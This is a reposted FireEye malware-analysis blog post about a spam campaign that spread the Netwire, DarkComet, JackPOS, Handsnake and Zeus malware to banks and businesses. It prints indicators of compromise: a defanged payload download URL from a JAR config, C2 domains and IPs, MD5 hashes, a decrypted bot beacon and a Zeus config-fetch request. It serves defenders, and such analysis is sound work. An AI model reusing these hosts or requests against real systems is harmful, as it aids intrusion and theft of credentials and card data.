Thursday, April 17, 2014

[fireeye] Crimeware or APT? Malware’s “Fifty Shades of Grey”

Some cybercriminals build massive botnets to use unsuspecting endpoints for spam, distributed denial-of-service (DDoS) attacks, or large-scale click fraud. With the aid of banking Trojans, other cybercriminals create smaller, specialized botnets that focus on stealing bank credentials and credit card information.

Remote access tools, or RATs, are an integral part of the cybercrime toolbox. For example, a recent FireEye investigation into XtremeRAT revealed that it had been propagated by spam campaigns that typically distribute Zeus variants and other banking-focused malware. This tactic may stem in part from the realization that compromising retailers can net millions of credit card numbers in one fell swoop.
Malware designed to compromise point-of-sale (POS) systems is not a new phenomenon. But we have seen a recent surge in malware that specifically targets these systems (e.g. ChewbaccaDexterBlackPOS andJackPOS). Moreover, POS malware is being deployed in an increasingly targeted manner. For example, some attacks against retailers have been characterized as “APT style” attacks —  a designation traditionally reserved for malware-based espionage sponsored on some level by nation-states.
The extent to which such attacks are targeted, and not opportunistic, is unclear. The attackers could be singling out specific retailers in advance. Or they could be targeting an entire industry, simply capitalizing on opportunities that arise.
In this blog post, we examine one case that clearly illustrates the nature of this problem.

Attack Vector

The suspicious email shown in Figure 1, which was sent to several companies, prompted us to take a closer look.
unipay1
Figure 1: Malicious email with JAR attachment
The content of the email is consistent with traditional spam messages that typically propagate banking Trojans. It does not appear to target the recipients specifically. The attachment is a Java archive file (JAR). When executed, the JAR file attempts to download and run an EXE from a remote location. The JAR does not contain a Java exploit per se; it simply uses java.net.URLConnection class to download the executable (since it is not running inside a sandbox).
The file “CUP retrieval request for 18 Feb 2014.jar” (2fd3c07ac16393723b528ca29a028c00) contains the following:

Size   Compressed   Name
42      50          cfg/config
104     106         META-INF/MANIFEST.MF
3905    2212        CrossPlatformInstaller.class
The “config” file contains the location of the EXE to be downloaded:

101#hxxp://himselp.net.in/css/acrord.exe

The file “acrord.exe” connects to rglink77[.]no-ip[.]biz / 37.220.31.113.

Netwire

The payload in this case is the Netwire RAT. Netwire emerged in 2012. It can be used to build malware for multiple operating systems, including Windows, MacOS, and Linux. The RAT is marketed on a variety of underground forums, selling for $40–$140.
This sample was configured with the tag “UNIPAY”, so that the attackers know which hosts were compromised during this campaign.
unipay2
While looking at the server hosting the file, which appears to be a compromised — but otherwise legitimate — website, we found an additional Netwire sample:
MD5FilenameDomainIP
8b0cd4952da32523524b1d30822ef0a8adobe.exec0der.zapto.org46.183.220.17

Email Extractor

We also discovered a simple tool that is used to extract email addresses. We found the output of this tool, which consisted of a list of 8,507 email addresses. It also contains the email that was used by the “sender” and its recipient (although we have seen other recipients that are not on this list).
unipay3
The list contains 1,351 domains that primarily appear to be banks, financial services companies (money transfer / exchange, investment), and businesses (such as shipping, engineering, IT) in the Middle East and Asia. In other words, these attackers are interested in a wide variety of targets.
A website statistics package on the server reveals that “acrord.exe” had been downloaded 802 times. This indicates that up to 9.4% of the targets may have opened the malicious attachment — and thus may have been compromised.

DarkComet

In addition to the Netwire RAT, the attackers are also using the DarkComet RAT. DarkComet has been available for free since 2008. It is popular on a variety of underground forums and used by a wide range of actors for many purposes. (After reports indicated that DarkComet was used in connection with the conflict in Syria, the creator of DarkComet, DarkCoderSC, created a removal tool and ultimately quit developing the RAT).
unipay4
In this case, the attackers used an older version of DarkComet (4.0) and specified the ID of “Email”, which probably indicates the attack vector for this campaign.
MD5FilenameDomainIP
ae6b419f4eb619d4be45dbfe6660a670oni.exeprivatecode.zapto.org209.166.87.161
12d8469512b581b60d7d5cce0733904ddcr.exeprivatecode.zapto.org209.166.87.161

JackPOS

We also found that the attackers were using JackPOS, a malware tool that has been previously used in successful attacks. JackPOS can dump memory and look for Track 1 and Track 2 credit card data using regular expressions. This data is then uploaded to a command-and-control (CnC) server.
MD5FilenameDomainIP
e7f1ba73cca6d99819d27216d09ecbbbspp.exeakuna.mcdir.ru178.208.83.38
We don’t know how the attackers were deploying JackPOS in this particular case, but we suspect that once targets of interest were identified using either Netwire or DarkComet, the attackers would then deploy JackPOS to steal credit card information.

Handsnake

The attackers in this case are also using a Carberp-based Trojan that has VNC capabilities that we call “handsnake.” This Trojan is described in more detail in a Polish-language white paper.
MD5FilenameDomainIP
aa8268ed9f8b32b708f50b56347075abxxx.exe185.29.8.19
Upon execution, the malware begins communication with the CnC server. The decrypted beacon is:

{"type":"handsnake","GUID":"{[GUID]}","BuildId":"plm_build","CompName":"[COMPUTERNAME]","SystemVersion":"Windows
XP Professional Service Pack 3 (build 2600); English (United
States)","ProcessorType":32,"ProcessorsCount":1,"ProcessorSpeed":2581,"BotVersion":34144256,"MemorySize":511,"token":false,"TimeZone":"GMT--7:00","UpTime":222,"IdleTime":1,"HaveWebCam":false,"UserName":"admin","Online":1}
At this point, the attackers can use the remote desktop function of the VNC component to take full control of the compromised system.

Zeus

In addition to the RATs and POS malware described above, we have also seen the attackers deploy the Zeus banking Trojan. They are using version MMBB 2.9.6.1, which has been previously described here.
MD5FilenameDomainIP
667c4f78fc1aeb45700734accc85e402xbot.exe217.23.1.188
When executed, the malware connects to the CnC server to download the “config” file, which contains the “webinjects” to be used:

GET /modules/config.bin HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)
Host: 217.23.1.188
Cache-Control: no-cache
The only major difference between this version of Zeus and previous versions is the shift from RC4 encryption to AES encryption.

Conclusion

The world of cybercrime features a broad spectrum of bad actors. On one end, highly focused state-sponsored attackers use custom tools and zero-day exploits. On the other end, “commodity” cybercriminals use widely deployed exploit kits that indiscriminately compromise thousands of systems around the globe.
In the middle are (at least) “fifty shades of grey.” One class of attacker mixes publicly available malware platforms and custom tools. These latter cases suggest that it is not always easy to estimate the size or sophistication of an adversary simply by finding one piece of what may be a far larger puzzle.

No comments:

Post a Comment